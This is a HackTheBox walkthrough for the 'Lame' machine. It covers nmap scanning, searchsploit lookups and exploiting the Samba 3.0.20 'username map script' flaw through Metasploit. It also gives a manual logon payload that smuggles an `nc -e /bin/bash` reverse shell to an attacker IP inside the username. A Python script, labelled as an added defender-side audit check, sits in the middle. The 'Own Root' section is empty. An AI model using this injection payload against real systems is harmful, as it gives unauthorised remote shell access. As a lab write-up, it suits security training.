Lame-HackTheBox Tutorial

Created by Deadeye 1633019013

Info about the machine

Lame is the first ever box created on HackTheBox. Its difficulty is easy.

Scanning the network

Command used: nmap -sC -sV 10.10.10.3

We found out that there is a vulnerable FTP service (vsftpd 2.3.4).

Command used: searchsploit vsftpd 2.3.4

We generated an exploit, but when we tried to execute it, it failed.

Vulnerable Samba

This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames before authentication!
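
A defender-side check for the condition described above, as an added example that is not part of the original write-up: it flags a host only when the Samba version falls in the 3.0.20 through 3.0.25rc3 range and smb.conf sets "username map script". The banner string, the sample smb.conf and the script path in it are constructed for illustration.

```python
import re

# Pre-releases sort before the final release of the same version number.
_STAGE = {"pre": 0, "rc": 1, None: 2}

def parse_version(banner):
    """Turn 'Samba 3.0.20-Debian' or '3.0.25rc3' into a sortable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:(pre|rc)(\d+))?", banner)
    if not m:
        raise ValueError(f"no Samba version in {banner!r}")
    major, minor, patch, stage, n = m.groups()
    return (int(major), int(minor), int(patch), _STAGE[stage], int(n or 0))

# Affected range as stated in the module description above.
LOW, HIGH = parse_version("3.0.20"), parse_version("3.0.25rc3")

def version_affected(banner):
    return LOW <= parse_version(banner) <= HIGH

def find_map_script(conf_text):
    """Return (section, value) for every 'username map script' setting.
    smb.conf ignores case and whitespace in parameter names."""
    hits, section = [], None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        name, sep, value = line.partition("=")  # only the first '=' counts
        if sep and re.sub(r"\s+", "", name).lower() == "usernamemapscript":
            hits.append((section, value.strip()))
    return hits

def audit(banner, conf_text):
    hits = find_map_script(conf_text)
    active = [h for h in hits if h[1]]          # an empty value means unset
    affected = version_affected(banner)
    return {"version_affected": affected, "map_script": hits,
            "exposed": affected and bool(active)}

# Constructed sample input, not taken from the target machine.
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/mapusers.sh
"""

if __name__ == "__main__":
    print(audit("Samba 3.0.20-Debian", SAMPLE_CONF))
```

A banner without a full three-part version raises ValueError instead of being reported as unaffected, so an unknown version is never silently treated as safe.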

Command used: searchsploit Samba 3.0.20

Exploiting the Server

For exploitation we used Metasploit.

Commands used:
msf5 > use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit

Manual Exploiting

logon "./=`nohup nc -e /bin/bash 10.10.14.7 4444`"
logon: used to log in to SMB
nohup: runs a command immune to hangups, with output to a non-tty

Own User

The user flag was located under the Makis user account.

Own Root
